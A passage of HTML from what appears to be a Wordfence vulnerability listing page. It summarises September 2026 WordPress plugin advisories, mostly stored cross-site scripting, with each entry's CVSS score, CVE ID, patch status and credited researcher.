<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f35ab5c-f897-404b-92ea-71bf1c98e0c0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65b6bbe4-1c34-47f3-b637-c79d97383abf" target="_blank" rel="noopener">Rara One Click Demo Import &lt;= 1.3.4 &#8211; Authenticated (Admin+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-26212" target="_blank" rel="noopener noreferrer">							CVE-2026-26212						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rara-one-click-demo-import" target="_blank" rel="noopener">Rara One Click Demo Import</a> <span class="wfvr-software-slug">[rara-one-click-demo-import]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rinesa-krasniqi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/edae1e57a627ce0f46652fcd0e2d5a81.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="edae1e57a627ce0f46652fcd0e2d5a81"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rinesa-krasniqi" target="_blank" rel="noopener">Rinesa Krasniqi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65b6bbe4-1c34-47f3-b637-c79d97383abf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55f9bfd7-e77c-4072-a1de-36f3ac1ffb81" target="_blank" rel="noopener">Repeater Fields for Gravity Forms &lt;= 3.0.4 &#8211; Unauthenticated Stored Cross-Site Scripting via Repeated Multi-Input Sub-Field Values</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84293" target="_blank" rel="noopener noreferrer">							CVE-2026-84293						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/repeater-for-gravity-forms" target="_blank" rel="noopener">Repeater Fields for Gravity Forms</a> <span class="wfvr-software-slug">[repeater-for-gravity-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55f9bfd7-e77c-4072-a1de-36f3ac1ffb81" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08e62276-f004-48ca-bb00-2f81e6ac4892" target="_blank" rel="noopener">Shopping Cart &amp; eCommerce Store &lt;= 5.9.3 &#8211; Authenticated (Store Manager+) Privilege Escalation to ec_ajax_save_page_default_options AJAX Action</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17553" target="_blank" rel="noopener noreferrer">							CVE-2026-17553						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-easycart" target="_blank" rel="noopener">Shopping Cart &amp; eCommerce Store</a> <span class="wfvr-software-slug">[wp-easycart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08e62276-f004-48ca-bb00-2f81e6ac4892" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f376b14-bdb4-4c4d-b464-328d269c9654" target="_blank" rel="noopener">Sidebar Manager Light &lt;= 1.18 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;sbm_description&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76562" target="_blank" rel="noopener noreferrer">							CVE-2026-76562						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sidebar-manager-light" target="_blank" rel="noopener">Sidebar Manager Light</a> <span class="wfvr-software-slug">[sidebar-manager-light]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f376b14-bdb4-4c4d-b464-328d269c9654" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8336d8d6-81ac-40a6-af1e-167c12440908" target="_blank" rel="noopener">Simple Ajax Chat &lt;= 20260811 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81825" target="_blank" rel="noopener noreferrer">							CVE-2026-81825						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-ajax-chat" target="_blank" rel="noopener">Simple Ajax Chat – Add a Fast, Secure Chat Box</a> <span class="wfvr-software-slug">[simple-ajax-chat]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hei-lai-sze" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1a0cd573e20faadd1c36717e9c6511d3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a0cd573e20faadd1c36717e9c6511d3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hei-lai-sze" target="_blank" rel="noopener">HEI LAI SZE</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8336d8d6-81ac-40a6-af1e-167c12440908" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13571c69-c11d-47c0-b911-60a0c2482b50" target="_blank" rel="noopener">Unlimited Elements For Elementor &lt;= 2.0.17 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84820" target="_blank" rel="noopener noreferrer">							CVE-2026-84820						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor" target="_blank" rel="noopener">Unlimited Elements For Elementor</a> <span class="wfvr-software-slug">[unlimited-elements-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13571c69-c11d-47c0-b911-60a0c2482b50" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba40115a-4a77-4b71-8f76-734e8db90d1b" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder &lt; 5.2.8 &#8211; Unauthenticated Open Redirect</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80072" target="_blank" rel="noopener noreferrer">							CVE-2026-80072						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</a> <span class="wfvr-software-slug">[user-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba40115a-4a77-4b71-8f76-734e8db90d1b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c483cdc5-56e4-4ee7-a782-0505816728ab" target="_blank" rel="noopener">Vigilant &lt;= 2.10.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81754" target="_blank" rel="noopener noreferrer">							CVE-2026-81754						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vigilante" target="_blank" rel="noopener">Vigilant – 100% Free Security Suite: Firewall, 2FA, Login, Headers, Scanner…</a> <span class="wfvr-software-slug">[vigilante]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sebastian-albrecht" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74ec76c9927875b63c4e7a78a1f8b00f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74ec76c9927875b63c4e7a78a1f8b00f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sebastian-albrecht" target="_blank" rel="noopener">Sebastian Albrecht</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c483cdc5-56e4-4ee7-a782-0505816728ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/251943ed-65d2-4635-9c84-2cf671233543" target="_blank" rel="noopener">WP Photo Album Plus &lt;= 9.2.08.003 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18579" target="_blank" rel="noopener noreferrer">							CVE-2026-18579						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">WP Photo Album Plus</a> <span class="wfvr-software-slug">[wp-photo-album-plus]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/251943ed-65d2-4635-9c84-2cf671233543" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c8bfa7ae-9908-4f4b-8fb4-d68c97423ae7" target="_blank" rel="noopener">WPAdverts – Classifieds Plugin &lt;= 2.3.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84819" target="_blank" rel="noopener noreferrer">							CVE-2026-84819						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpadverts" target="_blank" rel="noopener">WPAdverts – Classifieds Plugin</a> <span class="wfvr-software-slug">[wpadverts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ivaylo-atanassov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7faaaafa0bfd93340fbe2a85b731478a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7faaaafa0bfd93340fbe2a85b731478a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ivaylo-atanassov-2" target="_blank" rel="noopener">Ivaylo Atanassov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c8bfa7ae-9908-4f4b-8fb4-d68c97423ae7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/710fb372-4b7e-43e3-86a7-417143536f43" target="_blank" rel="noopener">WPBot &lt;= 8.7.3 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;conversation&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-83593" target="_blank" rel="noopener noreferrer">							CVE-2026-83593						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, WordPress Automation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ivaylo-atanassov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6eef6582da5a2797d89765abc3b43da9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6eef6582da5a2797d89765abc3b43da9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ivaylo-atanassov" target="_blank" rel="noopener">Ivaylo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/710fb372-4b7e-43e3-86a7-417143536f43" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e6b08fc-f42e-4e5b-be73-44af92c05d1d" target="_blank" rel="noopener">WPCS – WordPress Currency Switcher Professional &lt;= 1.3.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84816" target="_blank" rel="noopener noreferrer">							CVE-2026-84816						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/currency-switcher" target="_blank" rel="noopener">WPCS – WordPress Currency Switcher Professional</a> <span class="wfvr-software-slug">[currency-switcher]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e6b08fc-f42e-4e5b-be73-44af92c05d1d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/145cae1e-1e38-49bb-a63f-204246de6a37" target="_blank" rel="noopener">EDD Product Catalog Feed by PixelYourSite &lt;= 1.0.2 &#8211; Authenticated (Subscriber+) Arbitrary Options Deletion via Missing Authorization on &#8216;delete&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9331" target="_blank" rel="noopener noreferrer">							CVE-2026-9331						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/edd-products-feed-pro" target="_blank" rel="noopener">EDD Product Catalog Feed by PixelYourSite</a> <span class="wfvr-software-slug">[edd-products-feed-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/145cae1e-1e38-49bb-a63f-204246de6a37" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d95427d0-77c6-41d6-93f1-508999e14242" target="_blank" rel="noopener">Ninja Forms &lt;= 3.14.6 &#8211; Authenticated (Administrator+) PHP Object Injection via Form Import</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11363" target="_blank" rel="noopener noreferrer">							CVE-2026-11363						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
